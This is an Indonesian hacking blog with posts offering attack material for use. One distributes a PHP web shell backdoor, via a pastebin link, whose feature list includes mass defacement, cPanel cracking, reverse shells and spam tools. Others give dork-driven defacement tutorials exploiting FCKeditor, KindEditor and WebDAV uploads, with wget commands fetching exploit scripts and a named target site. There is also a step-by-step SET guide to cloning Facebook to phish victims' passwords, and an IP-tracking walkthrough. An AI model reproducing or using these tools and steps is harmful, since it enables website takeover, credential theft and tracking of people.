Senin, 21 Mei 2018

Membuat shell backdoor

Assalamualaikum wr.wb
kali ini saya bakal ngerilis shell backdoor, Sekedar info penting shell ini dibuat oleh FirewalL21, dan dibantu oleh teman lainya :v


shell ini dibuat atas permintaan anak anak act dan yang lainya. karna ActShellV.1 kurang lengkap toolsnya.

Seblumnya udah tau kan apa itu Shell Backdoor?   Shell Backdoor intinya adalah sekumpulan script/tools untuk mengekseskusi sebuah perintah web shell atau shell backdoor ini biasanya digunakan para defacer untuk mengeksekusi web , home deface atau yang lainnya. Jika anda sudah berhasil menanam shell pada sebuah site maka anda dapat mengambil alih site mengubah index,page login dan lain.lain


dan ini tampilan setelah login :



background Darknet :v wohh dah kaya heker belom gan :v

 dan ini fitur dari tabel shellnya :

- Home

- Upload
- Command
- Mass Deface
- Config
- LiteSpeed Config
- Jumping
- Symlink
- Symlink V.2
- Adminer
- Fake Root
- ReverseIP
- Cgi Telnet
- SMTP Grabber
- Auto Edit User
- Auto Edit Title WordPress
- WordPress Auto Deface
- WordPress Auto Deface V.2
- Wp Auto Hijack
- Cpanel Crack
- Bypass CloudFlare (file_get_content)
- Bypass etc/passwd
- Bypass vHost
- Defacer.ID
- Zone-H
- DataBase Dump
- String Tools (decode encode)

- DD0S
- Tools (reverse shell)

- Domains Viewer
- Csrf Exploiter
- Hash Generate (untuk mengecek dia memakai tipe hash apa)

- Magento DB Info
- Inject Code
- NginDexer
- WHMCS Decoder
- WHOIS
- HashID
- Drupal MassExploiter
- CMS Vulnerability Scanner
- Revslider MassExploiter
- elFinderMass
- Log Hunter
- Port Scaner
- KRDP Shell (hanya bisa digunakan di windows server)

- Back Connect
- Back Connect V.2
- Disable Functions
- Shell Checker
- Shell Finder
- Admin finder
- Zip Menu
- About
- LogOut


Gimana lumayan banyak kan toolsnya .? ini belom seberapa dibagian bawah shell masih banyak tools lagi.


begini tampilanya :



1. Tools Creator (ini berisi macam macam shell backdoor lain. jadi kalo kalian ingin gunakan backdoor lain gaperlu upload lagi tinggal klick saja :v )

¬ Tools Creator :
- WSO 2.8.1
- 1n73ction
- Tmp shell
- Dhanush Shell
- R57 Shell
- Encode Decode
- Uploader
- b374k Shell
- Shell Merica
- Act Shell V.1
- Brudul Shell
- Mini Shell
- Shell IndoXploit V.3
- Shell Badcode
- Shell NONAME
- Terserah shell
- 1337 Cp Crack
- MD5 CHECKER

2. Tools Spammer ( Ini buat lo yang suka spamming )


¬Tools Spammer :
- Pro Mailer V2
- Paypal Token Generator
- Mailer
- Mailer Mass send V.2
- Black Space Mailer
- priv 8 Tools
- Online credit card validator
- PayPal Valid Email Checker [ Fresh ]
- [ $ ] AmazOn Valid Checker [ $ ]
- Paypal Email Valid checker
- Priv8 Smtp & Other Setup
- Hotmail inbox
- Mass Mailer by F4jzar-xCyb3r207
- Mass Mailler Inbox
- Email Filter
- AMAZON Email Checker
- EBay Email Checker
- Database Emails Extractor
- BukaLapak Account Checker
- Tokopedia Checker

3. Tools Exploiter  (Tools para defacer neh :v )

¬Tools Exploiter :

- Auto File Upload phpMyAdmin
- Magento CMS BruteForce Admin Login
- CSRF Xploiter Online
- WordPress U-Design Themes Uploadify Dorker
- ShellShock Xploiter (WebBased)
- ShellShock Auto Xploit & Reverse Shell
- Webdav Mass Xploiter IP
- POPOJI CMS Add Admin Auto Registration
- SQL Dork Scanner via Bing Dorker [ Web ]
- Prestashop Modules Blocktestimonial File Upload
- WebConsole
- Local Root Exploiter by Makman ( No BackConnect )
- Bin Checker
- Drupal core 7.x
- KrimOu CPanel Cracker Script & Root Server
- Mass Revslider Exl0it1ng
- Extract Emails From WordPress–Joomla–OpenCart–WHMCS
- Reverse Ip Lookup Domain
- Bypass SafeMode
- Symlink Based cPanel
- Config Wordpress and Joomla Grabber
- WP2
- auto create sudomain
- Mini Mass Auto Xploiter Only Tools v1.0
- SCAN SERVER
- ownLFI| t00lkit v1.0 | By Asesino04
- PHP Info
- m0bil3_xT's SQLi Scanner
- Exploits Wordpress LFD
- xSec-BackDoor Generator [ Create Your Own Backdoor ]
- Bypass [ LiteSpeed - Nginx - Apache ] By b0x
- Upload File Using file_get_contents
- Proxy By Root
- Read File Using 3 Function
- MySQL Query Command Execute
- Create Htaccess
- Simple Bypasser [ fopen + file_get_contents ]
- Search For Blind SQL Injection vBulltein By List
- Get all Site Server
- Scanner Sh3LL'z & Dir'z
- Bypass SuPHP Version 2 [ Sfa7 trick ]
- Extract Users From Passwd
- Bypass Method Not implemented
- Get Wordpress User
- Wordpress Killer
- 3mlaq Games Exploit
- Extract Emails From OpenCart CMS
- Search For Exploit Via Exploit-DB
- Extract [id-username-password-salt-email]
- Get Tools From Your AppServ
- Checking joomla 1.6 - 1.7 Registration
- Login Form With SESSION Without Connect To Database
- Generate XML Plugin vBulletin [ ajax.php ]
- RCI Joomla Exploit PHP Version
- Kleeja XML Plugin Generator
- Joomla Brute Force
- 4images Brute Force
- Brute Force All Wordpress On Server
- Skype Brute Force PHP Version
- Twitter Brute Force
- Ask.Fm Brute Force
- Dimofinf Brute Force
- grabber sqli sites from ip
- Protect Folder Via Htaccess
- Add Http:// to sites
- WordPress NativeChurch theme LFI scanner
- Kumpulan LocalRoot Exploiter
- All Bypasser



gimana bro lumayan lengkap kan toolsnya ?

oke langsung aja pakai bro ini versi Darknet :v


https://pastebin.com/raw/7jeWTNg9

Sekian dari saya,  saya ucapkan terima kasih.
Wassalamualaikum wr.wb
Diposting oleh Ihsan di 19.33 0 komentar
Label:

Rabu, 02 Mei 2018

cara defece website menggunakan metode fckeditor

Assalamualaikum wr.wb
Di kesempatan kali ini saya akan membagikan cara defece website menggunakan metode fckeditor 

Contoh Google Dork FCKeditor:
- inurl:advert_detail.php?id=
Exploit:
- http:///www.site.co.li /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

  Pertama Cari Target Dengan Google Dork
Diposting oleh Ihsan di 16.18 0 komentar
Label:

cara defece website dengan kindeditor.


Assalamualaikum wr.wb
Kali ini saya akan membagikan tutorial cara defece website dengan kindeditor.

Masukan Dorknya ke kotak pencarian Google :

inurl:examples/uploadbutton.html
inurl:kindeditor

Pilih salah satu target yang ingin di deface.

 Exploit :

http://www.contohtarget.com/Kindeditor/examples/uploadbutton.html

1. Kalo web target udah dapet, kita klik upload.


 2. Kemudian pilih HTML defecan kalian, Contoh disini kita menggunakan HTML saya
    Sadis bos.html.


 3. Nanti akan keluar URL hasil upload-an HTML kita, copas link tersebut dan letakkan
    diakhir URL.
4.contohnya: www.contoh.com/di sini kalain masukin url yg tadi 
5.Kemudian kalo sudah, tekan Enter.

Oke sekian dulu tutorial kali ini semoga bermanfaat gunakan dengan bijak.
Wassalamualaikum Wr.wb
Diposting oleh Ihsan di 01.58 0 komentar
Label:

Minggu, 29 April 2018

Cara melacak alamat orang dengan termux

Assalamualaikum wr.wb
Kali ini saya akan membagikan tutorial cara melacak orang menggunakan ip.



1. Pertama-tama, kita update dan upgrade repository termux, dengan perintah :
apt update && apt upgrade
2. Lalu, kita install python, dengan perintah :
apt install python

3. Kemudian, kita install git, dengan perintah :
apt install git

4. Dan selanjutnya, kita kloning script IPGeolocation, dengan perintah :
git clone https://github.com/maldevel/IPGeolocation

5. Setelah itu, kita masuk ke direktori/folder IPGeolocation, dengan perintah :
cd IPGeolocation

6. Lalu, ketikkan perintah :
chmod +x ipgeolocation.py

7. Kemudian, kita install requirements, dengan perintah
pip install -r requirements.txt

8. Dan proses instalasi pun selesai.
Pertama-tama, untuk percobaan coba cek lokasi kita terlebih dahulu dengan perintah
python ipgeolocation.py -m

Disitu akan tertera lokasi kota kita sekarang ini dan tersedia juga link lokasi google map
Untuk melacak lokasi orang lain ketikkan perintah
python ipgeolocation.py -t IP yang ingin dilacak

contoh
python ipgeolocation.py -t 36.71.56.93


Diposting oleh Ihsan di 19.11 0 komentar
Label:

Sabtu, 28 April 2018

Cara Phising dengan tools Setoolkit (social engineering attack) di Linux

Assalamualaikum wr.wb
Kali ini saya akan membagikan tutorial
cara phising di tools Setoolkit atau bisa disebut social engineering attack 
ok langsung saja ikuti step by step nya ya ^_^ 

pertama kalian buka terminal linux kalian terus ketik : sudo/su setoolkit 
maka akan muncul seperti gambar yang di atas 
kemudian kita pilih nomer 1 yaitu : social engineering attack

maka akan muncul seperti ini : 


kemudian kita pilih no 2 : Website Attack Vectors 
maka akan muncul seperti ini : 
kemudian kita pilih no 5 : Web Jacking Attack Hasthod 

maka akan muncul seperti ini : 
kemudian kita pilih no 2 : Site Cloner
kenapa site cloner ? site cloner itu untuk kita masukan website yang akan kita tiru untuk login dan untuk mencebak korban kita.
setelah pilih no 2 nanti kita akan di suruh masukan website yang akan kita clone disini saya akan clone website facebook , kalian bebas mau nge clone web mana saja boleh yang untuk login yang pasti nya
nah kita disini akan di suruh masukan IP address , kalian masukan IP address masing-masing 

untuk linux tinggal ifconfig di terminal 
kemudian enter maka akan muncul seperti ini :
dan saya akan sembunyikan web yang tadi saya cloner
saya akan senbunyikan di web www.tinyurl.com :  

kita taruh si IP adress kita yang tadi yang berisi web yang kita cloner
klik Make Tinyurl   
maka akan seperti ini : 
disitu ada website yang tadi kita masukan dengan IP addres kita berubah menjadi www.TinyURL.com 
dan kita liat apakah berhasil ? jika berhasil maka akan seperti ini : 
kalau muncul seperti itu maka berhasil , jadi kita akan mengecoh si korban kita biar masuk jebakan kita , kita kasih saja web yang tadi : www.tinyurl.com

kalau muncul seperti itu maka berhasil , jadi kita akan mengecoh si korban kita biar masuk jebakan kita , kita kasih saja web yang tadi : www.tinyurl.com
dan akan menuju ke halaman ini dan di bacaan ini suruh menuju login facebook nya dan seperti ini lah hasil cloner nya :
nah jika si korban kita login dan bodoh nya :V wkwkwk 
kita bisa dapatkan email sama passwod facebook si korban 
liat ini cuma contoh ya :
TARAA kita dapat email dan password si korban ^_^ 
oh iya saya hampir lupa ngasih tau ke kalian jika sudah berhasil ngecloner jangan di tutup Terminal nya ya , biarkan saja dan tunggu aksi kita mencebak korban kita , dan ini lah hasil nya .
Sekian dulu tutorial kali ini. tunggu update dari saya.
Wassalamualaikum Wr.wb 
Diposting oleh Ihsan di 20.54 0 komentar
Label:

Cara Instal Webdav PHP Auto Exploiter di Termux

Pertama masukkan semua kode di bawah ini
  • $ apt update && apt upgrade 
  • $ apt install php
  • $ apt install php-apache
  • $ apt install php-dev
  • $ apt install php-fpm
  • $ apt install php-pgsql
Setelah semua terinstal lalu buat directori webdav dan install webdav
  • $ mkdir webdav
  • $ cd webdav
  • $ wget https://pastebin.com/raw/eTmsR6JA
  • $ ls
  • $ mv  eTmsR6JA webdav.php
Setelah file webdavnya terinstal lalu buat file list.htm dan script deface anda di directori webdav tadi
  • $ apt install nano
  • $ touch list.htm
  • $ touch scriptdeface.htm
  • $ ls
Lalu masukkan target di file list.htm
  • nano list.htm
  • pastekan url target anda di sana
  • ctrl-x
  • y
  • enter
Copy paste script deface anda di file scriptdeface.htm
  • nano scriptdeface.htm
  • paste kode script deface anda 
  • ctrl-x
  • y
  • enter
Cara menggunakannya seperti di bawah ini
  • $ php webdav.php list.htm scriptdeface.htm
Diposting oleh Ihsan di 06.59 0 komentar
Label:

Defece webdav ditermux

Assalamualaikum wr.wb
Kali ini saya membagikan tutorial Deface WEBDAV di Android
dork :
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache”
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:edu
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:gov
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:YOURCOUNTRY (misal: my, us, th. dll)
inurl:webdav
inurl:.com.x/*.asp
inurl:.edu.x/*.asp
inurl:.gov.x/*.asp
inurl:.net.x/*.asp
inurl:.org.x/*.asp

tutorial :
buka termux nya....ketik kode di bawah ini
  $ apt update && apt upgrade
  $ apt install python2
  $ pip2 install urllib3 chardet certifi idna requests
  $ apt install openssl curl
  $ pkg install libcurl 
  $ mkdir webdav
  $ cd webdav
  $ wget https://pastebin.com/raw/HnVyQPtR
  $ mv HnVyQPtR webdav.py
  $ chmod 777 webdav.py

trus kalian buat file script depes kalian di folder webdav tadi
  $ termux-setup-storage
Dan berikan hak akses termux untuk mengakses internal hp kalian

pindahkan script deface kalian di penyimpanan folder webdav dengan root explorer di "/data/data/com.termux/files/home/webdav"

atau kalian taru script deface kalian di penyimpanan internal dan jangan di masukkan folder apapun, lalu ketikkan kode di bawah ini

$ cp /sdcard/nama_script.htm ~/webdav 


langsung ke cara pakai nya
  $ python2 webdav.py (target.cok) (nama sc depes lu)
contoh nya
  $ python2 webdav.py http://orders.southeasternfood.com/ depes.htm
Selesai sekian dulu tutorial dari saya wassalamualaikum wr.wb
Diposting oleh Ihsan di 06.56 0 komentar
Label:
Langganan: Postingan (Atom)